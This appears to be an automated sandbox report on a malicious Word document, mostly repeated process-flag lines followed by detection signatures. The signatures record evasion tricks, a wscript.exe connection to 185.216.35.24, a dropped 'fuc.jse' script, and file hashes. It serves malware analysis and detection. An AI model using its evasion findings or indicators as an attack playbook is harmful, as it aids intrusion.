Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: 1072749549_VIRUS0045310798.doc

Stream path 'Data' entropy: 7.99141268818 (max. 8.0)

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 1004

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: wscript.exe, 00000006.00000002.667494834.0000000005A30000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000002.667494834.0000000005A30000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000006.00000002.667494834.0000000005A30000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000006.00000002.667494834.0000000005A30000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 185.216.35.24 80

Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: wscript.exe, 00000006.00000002.665472642.0000000003380000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000006.00000002.665472642.0000000003380000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: wscript.exe, 00000006.00000002.665472642.0000000003380000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: wscript.exe, 00000006.00000002.665472642.0000000003380000.00000002.00000001.sdmp	Binary or memory string: Program Manager3

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
23:00:48	API Interceptor	1023x Sleep call for process: splwow64.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1072749549_VIRUS0045310798.doc	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://api.aadrm.com/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w10x64_office

WINWORD.EXE (PID: 3480 cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding MD5: EFDE23ECDF60D334C31AF2A041439360)

splwow64.exe (PID: 6124 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)

wscript.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\wscript.exe 'C:\Users\user\AppData\Roaming\Microsoft\Word\fuc.jse' --10 MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BE32BEBA-DB68-44CB-BE87-43579C80C0C5 Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML document text
Size (bytes):	116464
Entropy (8bit):	5.376247486961989
Encrypted:	false
MD5:	7813C84EBB9BEACC17FF83A094D44E28
SHA1:	64BFF4F4EFCEE8E4305A97E739683FD1C988DB8C
SHA-256:	C2117E6E5DFF52C956F021B7BB422BBFA96C3579954921CBA0ED4A273BEE9B17
SHA-512:	ECAEE4E11E25A2C4A98F3B73FF98DA3496300C491AC4B0D5546A4F73452B21943BDA479B4C8CFB69784E1F08CAE36A72EB5029AFF990E95829675DBD08754460
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-01-24T22:00:44">.. Build: 16.0.12506.30000-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML document text
Size (bytes):	335239
Entropy (8bit):	5.173811567058612
Encrypted:	false
MD5:	25FF16D6EA6CBCA7FCCF1FC8AF0AF66A
SHA1:	43708F90F61CC598C124A417D7C07FAD23D4D1EB
SHA-256:	BDA4C6DEE8A67ADD7E416CB6BF339B9920BB38470F8DD752E962ED4D0BABA484
SHA-512:	25445BCBC382E791FC3BDCBC1DD1038E2842D022AD53CD1398CB961F2F81EE594C90059A46EC5533FE0792CBCD982C4CD30A41B6325A566C5107CC21A092E655
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2" F="Warning" /></C><C

C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	4152
Entropy (8bit):	1.175267485405119
Encrypted:	false
MD5:	8FAE03186F5F6B8896AF633C06F860D7
SHA1:	9A5B2BA980448708B8982E2AEFBDA0433A3BF8F5
SHA-256:	BEE953BA174AE849203B6D9E67578192D732E3C3654B666D55385878853F2EFB
SHA-512:	AD4707505446F81AE53BF85EB99FA97B8BA3D88E510FA30435223D212B6873172AB4C4DA5AC1134393C16C6C842C7B72CB1A06576B81BD357FD7B356227DDF01
Malicious:	false
Reputation:	low
Preview:	7....-..............@)......`}..............@)..r....;nvSQLite format 3......@ ..................................................................................d....d.g..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.session Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	SQLite 3.x database
Size (bytes):	12288
Entropy (8bit):	0.9294936802488373
Encrypted:	false
MD5:	10B5AD4C0CEF6B1AF5174CEDBAE6E45A
SHA1:	08002407DB9AFCF1C293DB45A9BAF46FC527B678
SHA-256:	04B53B8AFCA32E7840AD6E53EEB4E08E6A258AEC2022E97C870E699355887F16
SHA-512:	BE1B1B1DFA4086D7CFF646B8A3D2E4988DCC587CF46C9DB7EB2FCF57336FEC4E396590176C3A4DD25F38AF60C9FA3AED6E06F35CBE705A5E1282252A1F0AF479
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..................................................................................d....d.g......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.session-journal Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	13360
Entropy (8bit):	0.9072331108233327
Encrypted:	false
MD5:	D09C3BD103107E43E2A6E02ADDDEDBE5
SHA1:	925E1FA99DDFF84A61850D5892199672DCF18E8F
SHA-256:	0EB8ABCFAE377512E3AD284C270235B47FC86EA040E174B3293A0C63CD1772ED
SHA-512:	74A79B5E14AC7980A5D64BA6B5395A210B380220B29E06A8EE5B896D009EC251547CF6E817D8AA5C666039E7C3ACE37A785452B57B220BDF2880BABDC70ACC44
Malicious:	false
Reputation:	low
Preview:	............KN.?....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..................................................................................d....d.g..................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E81B547C.wmf Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Size (bytes):	214
Entropy (8bit):	3.3885048411858514
Encrypted:	false
